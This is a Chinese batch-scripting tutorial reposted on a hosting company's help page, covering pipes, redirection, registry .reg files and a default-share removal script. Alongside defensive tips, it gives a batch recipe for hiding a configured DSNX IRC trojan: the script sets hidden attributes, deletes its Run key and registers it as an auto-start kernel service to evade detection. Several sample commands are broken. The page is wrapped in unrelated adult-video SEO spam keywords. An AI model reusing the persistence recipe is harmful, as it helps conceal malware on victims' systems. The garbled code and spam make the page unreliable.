九色成人免费视频_久久一区视频_视频一区国产精品_精品视频在线观看

始創(chuàng)于2000年 股票代碼:831685
咨詢熱線:0371-60135900 注冊有禮 登錄
  • 掛牌上市企業(yè)
  • 60秒人工響應
  • 99.99%連通率
  • 7*24h人工
  • 故障100倍補償
全部產(chǎn)品
您的位置: 網(wǎng)站首頁 > 幫助中心>文章內容

批處理內部命令 (3)

發(fā)布時間:  2012/9/7 19:09:48

四、管道命令的使用
1.│ 命令
Usage:第一條命令 │ 第二條命令 [│ 第三條命令...]
將第一條命令的結果作為第二條命令的參數(shù)來使用,記得在unix中這種方式很常見。
sample:
time /t>>D:\IP.log
netstat -n -p tcp│find ":3389">>D:\IP.log
start Explorer
看出來了么?用于終端服務允許我們?yōu)橛脩糇远x起始的程序,來實現(xiàn)讓用戶運行下面這個bat,以獲得登
錄用戶的IP。
2.>、>>輸出重定向命令
將一條命令或某個程序輸出結果的重定向到特定文件中, > 與 >>的區(qū)別在于,>會清除調原有文件中的內
容后寫入指定文件,而>>只會追加內容到指定文件中,而不會改動其中的內容。
sample1:
echo hello world>c:\hello.txt (stupid example?)
sample2:
時下DLL木馬盛行,我們知道system32是個捉迷藏的好地方,許多木馬都削尖了腦袋往那里鉆,DLL馬也不
例外,針對這一點我們可以在安裝好系統(tǒng)和必要的應用程序后,對該目錄下的EXE和DLL文件作一個記錄:
運行CMD--轉換目錄到system32--dir *.exe>exeback.txt & dir *.dll>dllback.txt,
這樣所有的EXE和DLL文件的名稱都被分別記錄到exeback.txt和dllback.txt中,
日后如發(fā)現(xiàn)異常但用傳統(tǒng)的方法查不出問題時,則要考慮是不是系統(tǒng)中已經(jīng)潛入DLL木馬了.
這時我們用同樣的命令將system32下的EXE和DLL文件記錄到另外的exeback1.txt和dllback1.txt中,然后運
行:
CMD--fc exeback.txt exeback1.txt>diff.txt & fc dllback.txt dllback1.txt>diff.txt.(用FC命令比
較前后兩次的DLL和EXE文件,并將結果輸入到diff.txt中),這樣我們就能發(fā)現(xiàn)一些多出來的DLL和EXE文件,
然后通過查看創(chuàng)建時間、版本、是否經(jīng)過壓縮等就能夠比較容易地判斷出是不是已經(jīng)被DLL木馬光顧了。沒
有是最好,如果有的話也不要直接DEL掉,先用regsvr32 /u trojan.dll將后門DLL文件注銷掉,再把它移到
回收站里,若系統(tǒng)沒有異常反映再將之徹底刪除或者提交給殺毒軟件公司。
3.< 、>& 、<&
< 從文件中而不是從鍵盤中讀入命令輸入。
>& 將一個句柄的輸出寫入到另一個句柄的輸入中。
<& 從一個句柄讀取輸入并將其寫入到另一個句柄輸出中。
這些并不常用,也就不多做介紹。
 
五.如何用批處理文件來操作注冊表
在入侵過程中經(jīng)常回操作注冊表的特定的鍵值來實現(xiàn)一定的目的,例如:為了達到隱藏后門、木馬程序而刪
除Run下殘余的鍵值。或者創(chuàng)建一個服務用以加載后門。當然我們也會修改注冊表來加固系統(tǒng)或者改變系統(tǒng)
的某個屬性,這些都需要我們對注冊表操作有一定的了解。下面我們就先學習一下如何使用.REG文件來操
作注冊表.(我們可以用批處理來生成一個REG文件)
關于注冊表的操作,常見的是創(chuàng)建、修改、刪除。
1.創(chuàng)建
創(chuàng)建分為兩種,一種是創(chuàng)建子項(Subkey)
我們創(chuàng)建一個文件,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\hacker]
然后執(zhí)行該腳本,你就已經(jīng)在HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft下創(chuàng)建了一個名字為"hacker"的子
項。
另一種是創(chuàng)建一個項目名稱
那這種文件格式就是典型的文件格式,和你從注冊表中導出的文件格式一致,內容如下:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"Door"=C:\\WINNT\\system32\\door.exe
"Autodos"=dword:02
這樣就在[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下
新建了:Invader、door、about這三個項目
Invader的類型是"String value"
door的類型是"REG SZ value"
Autodos的類型是"DWORD value"
2.修改
修改相對來說比較簡單,只要把你需要修改的項目導出,然后用記事本進行修改,然后導入(regedit /s
)即可。
3.刪除
我們首先來說說刪除一個項目名稱,我們創(chuàng)建一個如下的文件:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Ex4rch"=-
執(zhí)行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]下的"Ex4rch"就
被刪除了;
我們再看看刪除一個子項,我們創(chuàng)建一個如下的腳本:
Windows Registry Editor Version 5.00
[-HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
執(zhí)行該腳本,[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]就已經(jīng)被刪除了

相信看到這里,.reg文件你基本已經(jīng)掌握了。那么現(xiàn)在的目標就是用批處理來創(chuàng)建特定內容的.reg文件了
,記得我們前面說道的利用重定向符號可以很容易地創(chuàng)建特定類型的文件。
samlpe1:如上面的那個例子,如想生成如下注冊表文件
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"Invader"="Ex4rch"
"door"=hex:255
"Autodos"=dword:000000128
只需要這樣:
@echo Windows Registry Editor Version 5.00>>Sample.reg
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]>Sample.reg
@echo "Invader"="Ex4rch">>Sample.reg
@echo "door"=5>>C:\\WINNT\\system32\\door.exe>>Sample.reg
@echo "Autodos"=dword:02>>Sample.reg
samlpe2:
我們現(xiàn)在在使用一些比較老的木馬時,可能會在注冊表的
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run(Runonce、Runservices、
Runexec)]下生成一個鍵值用來實現(xiàn)木馬的自啟動.但是這樣很容易暴露木馬程序的路徑,從而導致木馬被查
殺,相對地若是將木馬程序注冊為系統(tǒng)服務則相對安全一些.下面以配置好地IRC木馬DSNX為例(名為
windrv32.exe)
@start windrv32.exe
@attrib +h +r windrv32.exe
@echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] >>patch.dll
@echo "windsnx "=- >>patch.dll
@sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath=
c:\winnt\system32\windrv32.exe
@regedit /s patch.dll
@delete patch.dll
@REM [刪除DSNXDE在注冊表中的啟動項,用sc.exe將之注冊為系統(tǒng)關鍵性服務的同時將其屬性設為隱藏和
只讀,并config為自啟動]
@REM 這樣不是更安全.

六.精彩實例放送。
1.刪除win2k/xp系統(tǒng)默認共享的批處理
------------------------ cut here then save as .bat or .cmd file ---------------------------
@echo preparing to delete all the default shares.when ready pres any key.
@pause
@echo off
:Rem check parameters if null show usage.
if {%1}=={} goto :Usage
:Rem code start.
echo.
echo ------------------------------------------------------
echo.
echo Now deleting all the default shares.
echo.
net share %1$ /delete
net share %2$ /delete
net share %3$ /delete
net share %4$ /delete
net share %5$ /delete
net share %6$ /delete
net share %7$ /delete
net share %8$ /delete
net share %9$ /delete
net stop Server
net start Server
echo.
echo All the shares have been deleteed
echo.
echo ------------------------------------------------------
echo.
echo Now modify the registry to change the system default properties.
echo.
echo Now creating the registry file
echo Windows Registry Editor Version 5.00> c:\delshare.reg
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters]>>
c:\delshare.reg
echo "AutoShareWks"=dword:00000000>> c:\delshare.reg
echo "AutoShareServer"=dword:00000000>> c:\delshare.reg
echo Nowing using the registry file to chang the system default properties.
regedit /s c:\delshare.reg
echo Deleting the temprotarily files.
del c:\delshare.reg
goto :END
:Usage
echo.
echo ------------------------------------------------------
echo.
echo ☆ A example for batch file ☆
echo ☆ [Use batch file to change the sysytem share properties.] ☆
echo.
echo Author:Ex4rch
echo Mail:Ex4rch@hotmail.com QQ:1672602
echo.
echo Error:Not enough parameters
echo.
echo ☆ Please enter the share disk you wanna delete ☆
echo.
echo For instance,to delete the default shares:
echo delshare c d e ipc admin print
echo.
echo If the disklable is not as C: D: E: ,Please chang it youself.
echo.
echo example:
echo If locak disklable are C: D: E: X: Y: Z: ,you should chang the command into :
echo delshare c d e x y z ipc admin print
echo.
echo *** you can delete nine shares once in a useing ***
echo.
echo ------------------------------------------------------
goto :EOF
:END
echo.
echo -----------------------------------------

億恩科技地址(ADD):鄭州市黃河路129號天一大廈608室 郵編(ZIP):450008 傳真(FAX):0371-60123888
   聯(lián)系:億恩小凡
   QQ:89317007
   電話:0371-63322206


本文出自:億恩科技【www.23lll.com】

服務器租用/服務器托管中國五強!虛擬主機域名注冊頂級提供商!15年品質保障!--億恩科技[ENKJ.COM]

  • 您可能在找
  • 億恩北京公司:
  • 經(jīng)營性ICP/ISP證:京B2-20150015
  • 億恩鄭州公司:
  • 經(jīng)營性ICP/ISP/IDC證:豫B1.B2-20060070
  • 億恩南昌公司:
  • 經(jīng)營性ICP/ISP證:贛B2-20080012
  • 服務器/云主機 24小時售后服務電話:0371-60135900
  • 虛擬主機/智能建站 24小時售后服務電話:0371-60135900
  • 專注服務器托管17年
    掃掃關注-微信公眾號
    0371-60135900
    Copyright© 1999-2019 ENKJ All Rights Reserved 億恩科技 版權所有  地址:鄭州市高新區(qū)翠竹街1號總部企業(yè)基地億恩大廈  法律顧問:河南亞太人律師事務所郝建鋒、杜慧月律師   京公網(wǎng)安備41019702002023號
      0
     
     
     
     

    0371-60135900
    7*24小時客服服務熱線

     
     
    九色成人免费视频_久久一区视频_视频一区国产精品_精品视频在线观看
    国产精品卡一卡二| 一区二区三区无毛| 久久婷婷国产麻豆91天堂| 亚洲午夜在线观看| 99热在这里有精品免费| 最近看过的日韩成人| 久久精品国产第一区二区三区| 亚洲视频1区2区| 中文亚洲欧美| 一区二区不卡在线视频 午夜欧美不卡'| **网站欧美大片在线观看| 好吊色欧美一区二区三区视频| 国产欧美日韩在线| 国产欧美一级| 国产美女精品视频| 国产日韩欧美三级| 国模精品娜娜一二三区| 亚洲欧美日韩一区二区三区在线观看 | 亚洲欧美久久| 亚洲一区综合| 亚洲女人天堂av| 午夜久久福利| 久久精品91久久久久久再现| 欧美一区二区视频观看视频| 欧美一区二区三区电影在线观看| 欧美在线999| 亚洲国产成人av好男人在线观看| 亚洲第一色在线| 亚洲欧洲日韩综合二区| 99re在线精品| 亚洲一区免费观看| 羞羞答答国产精品www一本 | 久久蜜桃精品| 免费观看一区| 欧美日韩精品二区| 国产精品美女久久久久久2018| 国产精品视频一二| 国产综合视频| 亚洲国产二区| 一区二区免费在线视频| 午夜精品av| 91久久久久久国产精品| 99精品99| 性欧美精品高清| 快she精品国产999| 欧美日韩福利视频| 国产精品系列在线播放| 国产在线国偷精品产拍免费yy| 在线激情影院一区| 99亚洲伊人久久精品影院红桃| 亚洲中字黄色| 久久av资源网站| 9色porny自拍视频一区二区| 午夜精品久久久久久99热软件| 久久久另类综合| 欧美猛交免费看| 欧美综合激情网| 久久亚洲精选| 欧美日韩在线观看一区二区| 国产欧美欧洲在线观看| 亚洲国产精品一区二区第一页 | 一本色道久久综合| 欧美中文字幕| 一本色道久久88精品综合| 香蕉久久夜色精品国产| 欧美a级片网站| 国产精品一区二区a| 在线观看日韩www视频免费 | 欧美性做爰毛片| 狠狠色狠狠色综合| 亚洲视频你懂的| 亚洲黄色在线视频| 欧美一区二区三区久久精品| 欧美成人首页| 国产日韩av高清| 亚洲精品乱码久久久久久| 欧美一级视频| 亚洲视屏一区| 蜜臀av在线播放一区二区三区| 国产精品jizz在线观看美国 | 亚洲福利免费| 亚洲欧美在线一区| 在线亚洲一区观看| 免费国产一区二区| 国产精品稀缺呦系列在线| 亚洲精品欧美在线| 亚洲国产成人高清精品| 久久gogo国模裸体人体| 欧美日韩在线影院| 尤物视频一区二区| 欧美一区1区三区3区公司| 亚洲综合不卡| 欧美精品入口| 在线观看不卡av| 欧美一区二区三区久久精品| 亚洲宅男天堂在线观看无病毒| 欧美国产日韩一区二区在线观看| 国产一区二区三区在线免费观看| 一区二区精品| 一区二区精品| 欧美激情第4页| 亚洲大黄网站| 久久精品一区二区三区不卡| 欧美在线高清| 国产精品久久久久毛片软件 | 在线天堂一区av电影| 日韩午夜在线观看视频| 蜜桃av一区二区在线观看| 狠狠色狠狠色综合人人| 欧美一区在线看| 欧美在线三级| 国产欧美精品一区二区色综合 | 亚洲欧美国产高清| 亚洲男女毛片无遮挡| 欧美日韩综合| 99国产精品99久久久久久粉嫩| 亚洲剧情一区二区| 欧美黑人在线播放| 亚洲国产一区二区精品专区| 亚洲国产成人高清精品| 久久综合久久美利坚合众国| 国内精品写真在线观看| 欧美一区二区三区四区在线| 久久av一区二区三区亚洲| 国产视频一区二区三区在线观看| 亚洲欧美国产精品va在线观看 | 国产专区精品视频| 久久av一区二区| 美女图片一区二区| 在线看片一区| 日韩视频一区二区三区在线播放| 欧美日本一区二区三区| 日韩视频永久免费| 在线亚洲伦理| 亚洲在线一区| 国产精品一区免费视频| 亚洲性视频h| 欧美在线一区二区| 国产在线一区二区三区四区| 久久精品国产亚洲5555| 麻豆精品91| 亚洲精品黄色| 亚洲一级一区| 国产欧美日韩视频一区二区| 久久国产日本精品| 欧美**字幕| 日韩午夜高潮| 欧美亚洲一级片| 国外成人免费视频| 亚洲精品老司机| 欧美午夜精品久久久久久久| 亚洲一区二区成人| 久久久五月婷婷| 亚洲级视频在线观看免费1级| 中文精品视频| 国产女人精品视频| 亚洲精品1234| 欧美午夜宅男影院在线观看| 午夜精品久久久久| 欧美成人精品h版在线观看| 亚洲精品永久免费| 午夜亚洲视频| 一区二区亚洲欧洲国产日韩| 亚洲伦理在线免费看| 国产精品每日更新| 亚洲高清免费视频| 欧美日韩午夜剧场| 午夜伦欧美伦电影理论片| 免费观看一区| 亚洲一区欧美激情| 麻豆精品视频在线| 一区二区三区四区五区精品视频| 久久av一区二区三区漫画| 亚洲人成久久| 久久精品毛片| 亚洲日本免费| 久久精品午夜| 亚洲毛片视频| 久久久久久久尹人综合网亚洲| 亚洲另类自拍| 久久久久国产精品www| 亚洲精品日韩欧美| 久久精品国产久精国产一老狼| 亚洲激情小视频| 久久av一区二区三区| 亚洲精品美女在线观看| 久久精品视频99| 99精品久久久| 美日韩丰满少妇在线观看| 亚洲视频精品| 欧美国产日韩视频| 欧美在线观看天堂一区二区三区| 欧美女人交a| 久久精品国产亚洲一区二区三区| 欧美三级午夜理伦三级中视频| 亚洲国产一区二区三区高清 | 亚洲精品中文字| 国产一区二区三区观看| 亚洲主播在线观看| 亚洲黄色在线观看|